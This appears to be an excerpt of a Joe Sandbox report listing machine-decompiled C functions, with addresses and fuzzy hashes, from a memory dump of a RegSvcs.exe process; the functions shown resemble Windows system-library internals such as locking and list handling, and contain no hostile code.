								goto L19;
							}
							_t62 = _t62 & 0xf;
							if(E0105CB1E(_t62, _t85, _v8, 3, _t36 + 8) < 0) {
								L34:
								return _t88;
							}
							goto L19;
						}
						_t62 = _t85;
						_t36 = E0107ACFD(_t62, _t73, _t101, _t57, _t62);
						if(_t36 == 0) {
							goto L19;
						}
						goto L16;
					}
				}
			}

0x0107ae44
0x0107ae4c
0x0107ae53
0x0107ae55
0x0107ae5c
0x0107ae64
0x0107ae68
0x0107ae75
0x0107ae75
0x0107ae78
0x0107ae7a
0x0107ae7c
0x0107ae7f
0x0107aea8
0x0107aeab
0x0107aead
0x00000000
0x00000000
0x0107aeb3
0x0107aeb8
0x0107aebb
0x0107aebd
0x00000000
0x0107ae81
0x0107ae88
0x0107ae8f
0x0107ae9b
0x0107ae96
0x0107ae96
0x0107ae96
0x0107aea0
0x0107aea3
0x0107aebf
0x0107aebf
0x0107aec3
0x0107aec9
0x0107af0d
0x0107af14
0x0107af3d
0x0107af3d
0x0107af41
0x0107af44
0x0107af67
0x0107af67
0x0107af6a
0x0107afca
0x0107afd1
0x00000000
0x0107afd1
0x0107af6c
0x0107af6d
0x0107af75
0x0107af7c
0x0107af7e
0x0107af80
0x0107af85
0x0107af87
0x0107af99
0x0107af89
0x0107af92
0x0107af92
0x0107af9e
0x0107afa1
0x0107afa3
0x0107afa9
0x0107afb0
0x0107afb2
0x0107afb4
0x0107afbc
0x0107afbc
0x0107afb4
0x0107afb0
0x00000000
0x0107afa1
0x0107af4f
0x0107af57
0x0107af5c
0x0107af5e
0x00000000
0x00000000
0x0107af60
0x0107af64
0x0107af64
0x00000000
0x0107af64
0x0107af1a
0x0107af25
0x00000000
0x00000000
0x0107af27
0x0107af28
0x0107af33
0x00000000
0x0107aed0
0x0107aed0
0x0107aed2
0x0107aee1
0x0107aee4
0x00000000
0x00000000
0x0107aee6
0x0107aeec
0x00000000
0x00000000
0x0107aefb
0x0107af07
0x0107afd3
0x0107afdb
0x0107afdb
0x00000000
0x0107af07
0x0107aed6
0x0107aed8
0x0107aedf
0x00000000
0x00000000
0x00000000
0x0107aedf
0x0107aec9

Memory Dump Source

Source File: 00000001.00000002.377160882.0000000000F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000001.00000002.378745128.00000000010AB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.378771675.00000000010AF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_f90000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9db4202f04b0b516b9780a56f2b84d1504341199baa3fff2a6d0b12458d61021
Instruction ID: 8ea5935fdb807858ee99299ce11538d583d257ac734089661d7463535504a9ce
Opcode Fuzzy Hash: 9db4202f04b0b516b9780a56f2b84d1504341199baa3fff2a6d0b12458d61021
Instruction Fuzzy Hash: A24115B1F00211DBE72A9A69C894B7FB7DAAF84720F0C8659F9D6872C0D734D801C699

Uniqueness

Uniqueness Score: -1.00%

Function 00FDDBE9 Relevance: .1, Instructions: 149
COMMON

Download Yara Rule

C-Code - Quality: 86%

			E00FDDBE9(intOrPtr __ecx, intOrPtr __edx, signed int* _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v5;
				signed int _v12;
				signed int* _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				void* __ebx;
				void* __edi;
				signed int _t54;
				char* _t58;
				signed int _t66;
				intOrPtr _t67;
				intOrPtr _t68;
				intOrPtr _t72;
				intOrPtr _t73;
				signed int* _t75;
				intOrPtr _t79;
				intOrPtr _t80;
				char _t82;
				signed int _t83;
				signed int _t84;
				signed int _t88;
				signed int _t89;
				intOrPtr _t90;
				intOrPtr _t92;
				signed int _t97;
				intOrPtr _t98;
				intOrPtr* _t99;
				signed int* _t101;
				signed int* _t102;
				intOrPtr* _t103;
				intOrPtr _t105;
				signed int _t106;
				void* _t118;

				_t92 = __edx;
				_t75 = _a4;
				_t98 = __ecx;
				_v44 = __edx;
				_t106 = _t75[1];
				_v40 = __ecx;
				if(_t106 < 0 || _t106 <= 0 &&  *_t75 < 0) {
					_t82 = 0;
				} else {
					_t82 = 1;
				}
				_v5 = _t82;
				_t6 = _t98 + 0xc8; // 0xc9
				_t101 = _t6;
				 *((intOrPtr*)(_t98 + 0xd4)) = _a12;
				_v16 = _t92 + ((0 | _t82 != 0x00000000) - 0x00000001 & 0x00000048) + 8;
				 *((intOrPtr*)(_t98 + 0xd8)) = _a8;
				if(_t82 != 0) {
					 *(_t98 + 0xde) =  *(_t98 + 0xde) | 0x00000002;
					_t83 =  *_t75;
					_t54 = _t75[1];
					 *_t101 = _t83;
					_t84 = _t83 | _t54;
					_t101[1] = _t54;
					if(_t84 == 0) {
						_t101[1] = _t101[1] & _t84;
						 *_t101 = 1;
					}
					goto L19;
				} else {
					if(_t101 == 0) {
						E00FBCC50(E00FB4510(0xc000000d));
						_t88 =  *_t101;
						_t97 = _t101[1];
						L15:
						_v12 = _t88;
						_t66 = _t88 -  *_t75;
						_t89 = _t97;
						asm("sbb ecx, [ebx+0x4]");
						_t118 = _t89 - _t97;
						if(_t118 <= 0 && (_t118 < 0 || _t66 < _v12)) {
							_t66 = _t66 | 0xffffffff;
							_t89 = 0x7fffffff;
						}
						 *_t101 = _t66;
						_t101[1] = _t89;
						L19:
						if(E00FD7D50() != 0) {
							_t58 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
						} else {
							_t58 = 0x7ffe0386;
						}
						_t102 = _v16;
						if( *_t58 != 0) {
							_t58 = E01088ED6(_t102, _t98);
						}
						_t76 = _v44;
						E00FD2280(_t58, _v44);
						E00FDDD82(_v44, _t102, _t98);
						E00FDB944(_t102, _v5);
						return E00FCFFB0(_t76, _t98, _t76);
					}
					_t99 = 0x7ffe03b0;
					do {
						_t103 = 0x7ffe0010;
						do {
							_t67 =  *0x10a8628; // 0x0
							_v28 = _t67;
							_t68 =  *0x10a862c; // 0x0
							_v32 = _t68;
							_v24 =  *((intOrPtr*)(_t99 + 4));
							_v20 =  *_t99;
							while(1) {
								_t97 =  *0x7ffe000c;
								_t90 =  *0x7FFE0008;
								if(_t97 ==  *_t103) {
									goto L10;
								}
								asm("pause");
							}
							L10:
							_t79 = _v24;
							_t99 = 0x7ffe03b0;
							_v12 =  *0x7ffe03b0;
							_t72 =  *0x7FFE03B4;
							_t103 = 0x7ffe0010;
							_v36 = _t72;
						} while (_v20 != _v12 || _t79 != _t72);
						_t73 =  *0x10a8628; // 0x0
						_t105 = _v28;
						_t80 =  *0x10a862c; // 0x0
					} while (_t105 != _t73 || _v32 != _t80);
					_t98 = _v40;
					asm("sbb edx, [ebp-0x20]");
					_t88 = _t90 - _v12 - _t105;
					_t75 = _a4;
					asm("sbb edx, eax");
					_t31 = _t98 + 0xc8; // 0x107fb53
					_t101 = _t31;
					 *_t101 = _t88;
					_t101[1] = _t97;
					goto L15;
				}
			}

0x00fddbe9
0x00fddbf2
0x00fddbf7
0x00fddbf9
0x00fddbfc
0x00fddc00
0x00fddc03
0x00fddc14
0x00fddd54
0x00fddd54
0x00fddd54
0x00fddc18
0x00fddc1d
0x00fddc1d
0x00fddc32
0x00fddc3b
0x00fddc3e
0x00fddc46
0x00fddd5b
0x00fddd62
0x00fddd64
0x00fddd67
0x00fddd69
0x00fddd6b
0x00fddd6e
0x00fddd70
0x00fddd73
0x00fddd73
0x00000000
0x00fddc4c
0x00fddc4e
0x01023ae3
0x01023ae8
0x01023aea
0x00fddce7
0x00fddce9
0x00fddcec
0x00fddcee
0x00fddcf0
0x00fddcf3
0x00fddcf5
0x01023af2
0x01023af5
0x01023af5
0x00fddd06
0x00fddd08
0x00fddd0b
0x00fddd12
0x01023b08
0x00fddd18
0x00fddd18
0x00fddd18
0x00fddd20
0x00fddd23
0x01023b16
0x01023b16
0x00fddd29
0x00fddd2d
0x00fddd36
0x00fddd40
0x00fddd51
0x00fddd51
0x00fddc54
0x00fddc59
0x00fddc59
0x00fddc5e
0x00fddc5e
0x00fddc63
0x00fddc66
0x00fddc6b
0x00fddc78
0x00fddc7b
0x00fddc81
0x00fddc81
0x00fddc83
0x00fddc89
0x00000000
0x00000000
0x00fddd7b
0x00fddd7b
0x00fddc8f
0x00fddc8f
0x00fddc92
0x00fddc99
0x00fddc9f
0x00fddca5
0x00fddcaa
0x00fddcaa
0x00fddcb3
0x00fddcb8
0x00fddcbb
0x00fddcc1
0x00fddccf
0x00fddcd2
0x00fddcd5
0x00fddcd7
0x00fddcda
0x00fddcdc
0x00fddcdc
0x00fddce2
0x00fddce4
0x00000000
0x00fddce4

Memory Dump Source

Source File: 00000001.00000002.377160882.0000000000F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000001.00000002.378745128.00000000010AB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.378771675.00000000010AF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_f90000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3a1bfebd76fcae41c737b2e0bc7e82e1580d27e3d71895525cfd98f689f770f3
Instruction ID: b3556933bded6357831dd009529e8f7f26f40368c8cd58fe5538634d76a6cb85
Opcode Fuzzy Hash: 3a1bfebd76fcae41c737b2e0bc7e82e1580d27e3d71895525cfd98f689f770f3
Instruction Fuzzy Hash: B0518C71E00615DFCB15CFA8C490AAEBBF6BB48310F28815AD995AB344EB35AD44DB90

Uniqueness

Uniqueness Score: -1.00%

Function 00FCEF40 Relevance: .1, Instructions: 147
COMMON

Download Yara Rule

C-Code - Quality: 96%

			E00FCEF40(intOrPtr __ecx) {
				char _v5;
				char _v6;
				char _v7;
				char _v8;
				signed int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t58;
				char _t59;
				signed char _t69;
				void* _t73;
				signed int _t74;
				char _t79;
				signed char _t81;
				signed int _t85;
				signed int _t87;
				intOrPtr _t90;
				signed char* _t91;
				void* _t92;
				signed int _t94;
				void* _t96;

				_t90 = __ecx;
				_v16 = __ecx;
				if(( *(__ecx + 0x14) & 0x04000000) != 0) {
					_t58 =  *((intOrPtr*)(__ecx));
					if(_t58 != 0xffffffff &&  *((intOrPtr*)(_t58 + 8)) == 0) {
						E00FB9080(_t73, __ecx, __ecx, _t92);
					}
				}
				_t74 = 0;
				_t96 =  *0x7ffe036a - 1;
				_v12 = 0;
				_v7 = 0;
				if(_t96 > 0) {
					_t74 =  *(_t90 + 0x14) & 0x00ffffff;
					_v12 = _t74;
					_v7 = _t96 != 0;
				}
				_t79 = 0;
				_v8 = 0;
				_v5 = 0;
				while(1) {
					L4:
					_t59 = 1;
					L5:
					while(1) {
						if(_t59 == 0) {
							L12:
							_t21 = _t90 + 4; // 0x7788c21e
							_t87 =  *_t21;
							_v6 = 0;
							if(_t79 != 0) {
								if((_t87 & 0x00000002) != 0) {
									goto L19;
								}
								if((_t87 & 0x00000001) != 0) {
									_v6 = 1;
									_t74 = _t87 ^ 0x00000003;
								} else {
									_t51 = _t87 - 2; // -2
									_t74 = _t51;
								}
								goto L15;
							} else {
								if((_t87 & 0x00000001) != 0) {
									_v6 = 1;
									_t74 = _t87 ^ 0x00000001;
								} else {
									_t26 = _t87 - 4; // -4
									_t74 = _t26;
									if((_t74 & 0x00000002) == 0) {
										_t74 = _t74 - 2;
									}
								}
								L15:
								if(_t74 == _t87) {
									L19:
									E00FB2D8A(_t74, _t90, _t87, _t90);
									_t74 = _v12;
									_v8 = 1;
									if(_v7 != 0 && _t74 > 0x64) {
										_t74 = _t74 - 1;
										_v12 = _t74;
									}
									_t79 = _v5;
									goto L4;
								}
								asm("lock cmpxchg [esi], ecx");
								if(_t87 != _t87) {
									_t74 = _v12;
									_t59 = 0;
									_t79 = _v5;
									continue;
								}
								if(_v6 != 0) {
									_t74 = _v12;
									L25:
									if(_v7 != 0) {
										if(_t74 < 0x7d0) {
											if(_v8 == 0) {
												_t74 = _t74 + 1;
											}
										}
										_t38 = _t90 + 0x14; // 0x0
										_t39 = _t90 + 0x14; // 0x0
										_t85 = ( *_t38 ^ _t74) & 0x00ffffff ^  *_t39;
										if( *((intOrPtr*)( *[fs:0x30] + 0x64)) == 1) {
											_t85 = _t85 & 0xff000000;
										}
										 *(_t90 + 0x14) = _t85;
									}
									 *((intOrPtr*)(_t90 + 0xc)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
									 *((intOrPtr*)(_t90 + 8)) = 1;
									return 0;
								}
								_v5 = 1;
								_t87 = _t74;
								goto L19;
							}
						}
						_t94 = _t74;
						_v20 = 1 + (0 | _t79 != 0x00000000) * 2;
						if(_t74 == 0) {
							goto L12;
						} else {
							_t91 = _t90 + 4;
							goto L8;
							L9:
							while((_t81 & 0x00000001) != 0) {
								_t69 = _t81;
								asm("lock cmpxchg [edi], edx");
								if(_t69 != _t81) {
									_t81 = _t69;
									continue;
								}
								_t90 = _v16;
								goto L25;
							}
							asm("pause");
							_t94 = _t94 - 1;
							if(_t94 != 0) {
								L8:
								_t81 =  *_t91;
								goto L9;
							} else {
								_t90 = _v16;
								_t79 = _v5;
								goto L12;
							}
						}
					}
				}
			}

0x00fcef4b
0x00fcef4d
0x00fcef57
0x00fcf0bd
0x00fcf0c2
0x00fcf0d2
0x00fcf0d2
0x00fcf0c2
0x00fcef5d
0x00fcef5f
0x00fcef67
0x00fcef6a
0x00fcef6d
0x00fcef74
0x00fcef7f
0x00fcef82
0x00fcef82
0x00fcef86
0x00fcef88
0x00fcef8c
0x00fcef8f
0x00fcef8f
0x00fcef8f
0x00000000
0x00fcef91
0x00fcef93
0x00fcefc4
0x00fcefc4
0x00fcefc4
0x00fcefca
0x00fcefd0
0x00fcf0a6
0x00000000
0x00000000
0x00fcf0af
0x0101bb06
0x0101bb0a
0x00fcf0b5
0x00fcf0b5
0x00fcf0b5
0x00fcf0b5
0x00000000
0x00fcefd6
0x00fcefd9
0x00fcf0de
0x00fcf0e2
0x00fcefdf
0x00fcefdf
0x00fcefdf
0x00fcefe5
0x0101bafc
0x0101bafc
0x00fcefe5
0x00fcefeb
0x00fcefed
0x00fcf00f
0x00fcf011
0x00fcf01a
0x00fcf01d
0x00fcf021
0x00fcf028
0x00fcf029
0x00fcf029
0x00fcf02c
0x00000000
0x00fcf02c
0x00fceff3
0x00fceff9
0x00fcf0ea
0x00fcf0ed
0x00fcf0ef
0x00000000
0x00fcf0ef
0x00fcf003
0x0101bb12
0x00fcf045
0x00fcf049
0x00fcf051
0x00fcf09e
0x00fcf0a0
0x00fcf0a0
0x00fcf09e
0x00fcf053
0x00fcf064
0x00fcf064
0x00fcf06b
0x0101bb1a
0x0101bb1a
0x00fcf071
0x00fcf071
0x00fcf07d
0x00fcf082
0x00fcf08f
0x00fcf08f
0x00fcf009
0x00fcf00d
0x00000000
0x00fcf00d
0x00fcefd0
0x00fcef97
0x00fcefa5
0x00fcefaa
0x00000000
0x00fcefac
0x00fcefac
0x00fcefac
0x00000000
0x00fcefb2
0x00fcf036
0x00fcf03a
0x00fcf040
0x00fcf090
0x00000000
0x00fcf092
0x00fcf042
0x00000000
0x00fcf042
0x00fcefb7
0x00fcefb9
0x00fcefbc
0x00fcefb0
0x00fcefb0
0x00000000
0x00fcefbe
0x00fcefbe
0x00fcefc1
0x00000000
0x00fcefc1
0x00fcefbc
0x00fcefaa
0x00fcef91

Memory Dump Source

Source File: 00000001.00000002.377160882.0000000000F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000001.00000002.378745128.00000000010AB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.378771675.00000000010AF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_f90000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fbecc144452e6e9740e37df579310400ca1de53fcc592e2907188de4c37816b0
Instruction ID: 07dec96e3be48271f01069707ea0558b942c4d26195326564b777ac262b08e93
Opcode Fuzzy Hash: fbecc144452e6e9740e37df579310400ca1de53fcc592e2907188de4c37816b0
Instruction Fuzzy Hash: 5151E531E042469FDB24CB68C2D2FAEFBF2AF55324F2481BCD44597282C375A989E751

Uniqueness

Uniqueness Score: -1.00%

Function 0108740D Relevance: .1, Instructions: 141
COMMON

Download Yara Rule

C-Code - Quality: 84%

			E0108740D(intOrPtr __ecx, signed short* __edx, intOrPtr _a4) {
				signed short* _v8;
				intOrPtr _v12;
				intOrPtr _t55;
				void* _t56;
				intOrPtr* _t66;
				intOrPtr* _t69;
				void* _t74;
				intOrPtr* _t78;
				intOrPtr* _t81;
				intOrPtr* _t82;
				intOrPtr _t83;
				signed short* _t84;
				intOrPtr _t85;
				signed int _t87;
				intOrPtr* _t90;
				intOrPtr* _t93;
				intOrPtr* _t94;
				void* _t98;

				_t84 = __edx;
				_t80 = __ecx;
				_push(__ecx);
				_push(__ecx);
				_t55 = __ecx;
				_v8 = __edx;
				_t87 =  *__edx & 0x0000ffff;
				_v12 = __ecx;
				_t3 = _t55 + 0x154; // 0x154
				_t93 = _t3;
				_t78 =  *_t93;
				_t4 = _t87 + 2; // 0x2
				_t56 = _t4;
				while(_t78 != _t93) {
					if( *((intOrPtr*)(_t78 + 0x14)) != _t56) {
						L4:
						_t78 =  *_t78;
						continue;
					} else {
						_t7 = _t78 + 0x18; // 0x18
						if(E0100D4F0(_t7, _t84[2], _t87) == _t87) {
							_t40 = _t78 + 0xc; // 0xc
							_t94 = _t40;
							_t90 =  *_t94;
							while(_t90 != _t94) {
								_t41 = _t90 + 8; // 0x8
								_t74 = E00FFF380(_a4, _t41, 0x10);
								_t98 = _t98 + 0xc;
								if(_t74 != 0) {
									_t90 =  *_t90;
									continue;
								}
								goto L12;
							}
							_t82 = L00FD4620(_t80,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x18);
							if(_t82 != 0) {
								_t46 = _t78 + 0xc; // 0xc
								_t69 = _t46;
								asm("movsd");
								asm("movsd");
								asm("movsd");
								asm("movsd");
								_t85 =  *_t69;
								if( *((intOrPtr*)(_t85 + 4)) != _t69) {
									L20:
									_t82 = 3;
									asm("int 0x29");
								}
								 *((intOrPtr*)(_t82 + 4)) = _t69;
								 *_t82 = _t85;
								 *((intOrPtr*)(_t85 + 4)) = _t82;
								 *_t69 = _t82;
								 *(_t78 + 8) =  *(_t78 + 8) + 1;
								 *(_v12 + 0xdc) =  *(_v12 + 0xdc) | 0x00000010;
								goto L11;
							} else {
								L18:
								_push(0xe);
								_pop(0);
							}
						} else {
							_t84 = _v8;
							_t9 = _t87 + 2; // 0x2
							_t56 = _t9;
							goto L4;
						}
					}
					L12:
					return 0;
				}
				_t10 = _t87 + 0x1a; // 0x1a
				_t78 = L00FD4620(_t80,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t10);
				if(_t78 == 0) {
					goto L18;
				} else {
					_t12 = _t87 + 2; // 0x2
					 *((intOrPtr*)(_t78 + 0x14)) = _t12;
					_t16 = _t78 + 0x18; // 0x18
					E00FFF3E0(_t16, _v8[2], _t87);
					 *((short*)(_t78 + _t87 + 0x18)) = 0;
					_t19 = _t78 + 0xc; // 0xc
					_t66 = _t19;
					 *((intOrPtr*)(_t66 + 4)) = _t66;
					 *_t66 = _t66;
					 *(_t78 + 8) =  *(_t78 + 8) & 0x00000000;
					_t81 = L00FD4620(_t80,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x18);
					if(_t81 == 0) {
						goto L18;
					} else {
						_t26 = _t78 + 0xc; // 0xc
						_t69 = _t26;
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						_t85 =  *_t69;
						if( *((intOrPtr*)(_t85 + 4)) != _t69) {
							goto L20;
						} else {
							 *((intOrPtr*)(_t81 + 4)) = _t69;
							 *_t81 = _t85;
							 *((intOrPtr*)(_t85 + 4)) = _t81;
							 *_t69 = _t81;
							_t83 = _v12;
							 *(_t78 + 8) = 1;
							 *(_t83 + 0xdc) =  *(_t83 + 0xdc) | 0x00000010;
							_t34 = _t83 + 0x154; // 0x1ba
							_t69 = _t34;
							_t85 =  *_t69;
							if( *((intOrPtr*)(_t85 + 4)) != _t69) {
								goto L20;
							} else {
								 *_t78 = _t85;
								 *((intOrPtr*)(_t78 + 4)) = _t69;
								 *((intOrPtr*)(_t85 + 4)) = _t78;
								 *_t69 = _t78;
								 *(_t83 + 0xdc) =  *(_t83 + 0xdc) | 0x00000010;
							}
						}
						goto L11;
					}
				}
				goto L12;
			}

0x0108740d
0x0108740d
0x01087412
0x01087413
0x01087416
0x01087418
0x0108741c
0x0108741f
0x01087422
0x01087422
0x01087428
0x0108742a
0x0108742a
0x01087451
0x01087432
0x0108744f
0x0108744f
0x00000000
0x01087434
0x01087438
0x01087443
0x01087517
0x01087517
0x0108751a
0x01087535
0x01087520
0x01087527
0x0108752c
0x01087531
0x01087533
0x00000000
0x01087533
0x00000000
0x01087531
0x0108754b
0x0108754f
0x0108755c
0x0108755c
0x0108755f
0x01087560
0x01087561
0x01087562
0x01087563
0x01087568
0x0108756a
0x0108756c
0x0108756d
0x0108756d
0x0108756f
0x01087572
0x01087574
0x01087577
0x0108757c
0x0108757f
0x00000000
0x01087551
0x01087551
0x01087551
0x01087553
0x01087553
0x01087449
0x01087449
0x0108744c
0x0108744c
0x00000000
0x0108744c
0x01087443
0x0108750e
0x01087514
0x01087514
0x01087455
0x01087469
0x0108746d
0x00000000
0x01087473
0x01087473
0x01087476
0x01087480
0x01087484
0x0108748e
0x01087493
0x01087493
0x01087496
0x01087499
0x010874a1
0x010874b1
0x010874b5
0x00000000
0x010874bb
0x010874c1
0x010874c1
0x010874c4
0x010874c5
0x010874c6
0x010874c7
0x010874c8
0x010874cd
0x00000000
0x010874d3
0x010874d3
0x010874d6
0x010874d8
0x010874db
0x010874dd
0x010874e0
0x010874e7
0x010874ee
0x010874ee
0x010874f4
0x010874f9
0x00000000
0x010874fb
0x010874fb
0x010874fd
0x01087500
0x01087503
0x01087505
0x01087505
0x010874f9
0x00000000
0x010874cd
0x010874b5
0x00000000

Memory Dump Source

Source File: 00000001.00000002.377160882.0000000000F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000001.00000002.378745128.00000000010AB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.378771675.00000000010AF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_f90000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 01a4d08349e29d22493120a27b3d49beb444160764ac4f0ac8d9a4757e3060ec
Instruction ID: e51ac5096d0e6d9fc05c561576f00e09ea7d6a2c7e091728d039a06811306ad3
Opcode Fuzzy Hash: 01a4d08349e29d22493120a27b3d49beb444160764ac4f0ac8d9a4757e3060ec
Instruction Fuzzy Hash: 13519F71500646DFDB16DF18C880A56BBF5FF45304F24C0BAE9489F216E7B1E945CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00FE2990 Relevance: .1, Instructions: 133
COMMON

Download Yara Rule

C-Code - Quality: 97%

			E00FE2990() {
				signed int* _t62;
				signed int _t64;
				intOrPtr _t66;
				signed short* _t69;
				intOrPtr _t76;
				signed short* _t79;
				void* _t81;
				signed int _t82;
				signed short* _t83;
				signed int _t87;
				intOrPtr _t91;
				void* _t98;
				signed int _t99;
				void* _t101;
				signed int* _t102;
				void* _t103;
				void* _t104;
				void* _t107;

				_push(0x20);
				_push(0x108ff00);
				E0100D08C(_t81, _t98, _t101);
				 *((intOrPtr*)(_t103 - 0x28)) =  *[fs:0x18];
				_t99 = 0;
				 *((intOrPtr*)( *((intOrPtr*)(_t103 + 0x1c)))) = 0;
				_t82 =  *((intOrPtr*)(_t103 + 0x10));
				if(_t82 == 0) {
					_t62 = 0xc0000100;
				} else {
					 *((intOrPtr*)(_t103 - 4)) = 0;
					_t102 = 0xc0000100;
					 *((intOrPtr*)(_t103 - 0x30)) = 0xc0000100;
					_t64 = 4;
					while(1) {
						 *(_t103 - 0x24) = _t64;
						if(_t64 == 0) {
							break;
						}
						_t87 = _t64 * 0xc;
						 *(_t103 - 0x2c) = _t87;
						_t107 = _t82 -  *((intOrPtr*)(_t87 + 0xf91664));
						if(_t107 <= 0) {
							if(_t107 == 0) {
								_t79 = E00FFE5C0( *((intOrPtr*)(_t103 + 0xc)),  *((intOrPtr*)(_t87 + 0xf91668)), _t82);
								_t104 = _t104 + 0xc;
								__eflags = _t79;
								if(__eflags == 0) {
									_t102 = E010351BE(_t82,  *((intOrPtr*)( *(_t103 - 0x2c) + 0xf9166c)),  *((intOrPtr*)(_t103 + 0x14)), _t99, _t102, __eflags,  *((intOrPtr*)(_t103 + 0x18)),  *((intOrPtr*)(_t103 + 0x1c)));
									 *((intOrPtr*)(_t103 - 0x30)) = _t102;
									break;
								} else {
									_t64 =  *(_t103 - 0x24);
									goto L5;
								}
								goto L13;
							} else {
								L5:
								_t64 = _t64 - 1;
								continue;
							}
						}
						break;
					}
					 *((intOrPtr*)(_t103 - 0x1c)) = _t102;
					__eflags = _t102;
					if(_t102 < 0) {
						__eflags = _t102 - 0xc0000100;
						if(_t102 == 0xc0000100) {
							_t83 =  *((intOrPtr*)(_t103 + 8));
							__eflags = _t83;
							if(_t83 != 0) {
								 *((intOrPtr*)(_t103 - 0x20)) = _t83;
								__eflags =  *_t83 - _t99;
								if( *_t83 == _t99) {
									_t102 = 0xc0000100;
									goto L19;
								} else {
									_t91 =  *((intOrPtr*)( *((intOrPtr*)(_t103 - 0x28)) + 0x30));
									_t66 =  *((intOrPtr*)(_t91 + 0x10));
									__eflags =  *((intOrPtr*)(_t66 + 0x48)) - _t83;
									if( *((intOrPtr*)(_t66 + 0x48)) == _t83) {
										__eflags =  *((intOrPtr*)(_t91 + 0x1c));
										if( *((intOrPtr*)(_t91 + 0x1c)) == 0) {
											L26:
											_t102 = E00FE2AE4(_t103 - 0x20,  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)),  *((intOrPtr*)(_t103 + 0x1c)));
											 *((intOrPtr*)(_t103 - 0x1c)) = _t102;
											__eflags = _t102 - 0xc0000100;
											if(_t102 != 0xc0000100) {
												goto L12;
											} else {
												_t99 = 1;
												_t83 =  *((intOrPtr*)(_t103 - 0x20));
												goto L18;
											}
										} else {
											_t69 = E00FC6600( *((intOrPtr*)(_t91 + 0x1c)));
											__eflags = _t69;
											if(_t69 != 0) {
												goto L26;
											} else {
												_t83 =  *((intOrPtr*)(_t103 + 8));
												goto L18;
											}
										}
									} else {
										L18:
										_t102 = E00FE2C50(_t83,  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)),  *((intOrPtr*)(_t103 + 0x1c)), _t99);
										L19:
										 *((intOrPtr*)(_t103 - 0x1c)) = _t102;
										goto L12;
									}
								}
								L28:
							} else {
								E00FCEEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
								 *((intOrPtr*)(_t103 - 4)) = 1;
								 *((intOrPtr*)(_t103 - 0x20)) =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t103 - 0x28)) + 0x30)) + 0x10)) + 0x48));
								_t102 =  *((intOrPtr*)(_t103 + 0x1c));
								_t76 = E00FE2AE4(_t103 - 0x20,  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)), _t102);
								 *((intOrPtr*)(_t103 - 0x1c)) = _t76;
								__eflags = _t76 - 0xc0000100;
								if(_t76 == 0xc0000100) {
									 *((intOrPtr*)(_t103 - 0x1c)) = E00FE2C50( *((intOrPtr*)(_t103 - 0x20)),  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)), _t102, 1);
								}
								 *((intOrPtr*)(_t103 - 4)) = _t99;
								E00FE2ACB();
							}
						}
					}
					L12:
					 *((intOrPtr*)(_t103 - 4)) = 0xfffffffe;
					_t62 = _t102;
				}
				L13:
				return E0100D0D1(_t62);
				goto L28;
			}

0x00fe2990
0x00fe2992
0x00fe2997
0x00fe29a3
0x00fe29a6
0x00fe29ab
0x00fe29ad
0x00fe29b2
0x01025c80
0x00fe29b8
0x00fe29b8
0x00fe29bb
0x00fe29c0
0x00fe29c5
0x00fe29c6
0x00fe29c6
0x00fe29cb
0x00000000
0x00000000
0x00fe29cd
0x00fe29d0
0x00fe29d9
0x00fe29db
0x00fe29dd
0x00fe2a7f
0x00fe2a84
0x00fe2a87
0x00fe2a89
0x01025ca1
0x01025ca3
0x00000000
0x00fe2a8f
0x00fe2a8f
0x00000000
0x00fe2a8f
0x00000000
0x00fe29e3
0x00fe29e3
0x00fe29e3
0x00000000
0x00fe29e3
0x00fe29dd
0x00000000
0x00fe29db
0x00fe29e6
0x00fe29e9
0x00fe29eb
0x00fe29ed
0x00fe29f3
0x00fe29f5
0x00fe29f8
0x00fe29fa
0x00fe2a97
0x00fe2a9a
0x00fe2a9d
0x00fe2add
0x00000000
0x00fe2a9f
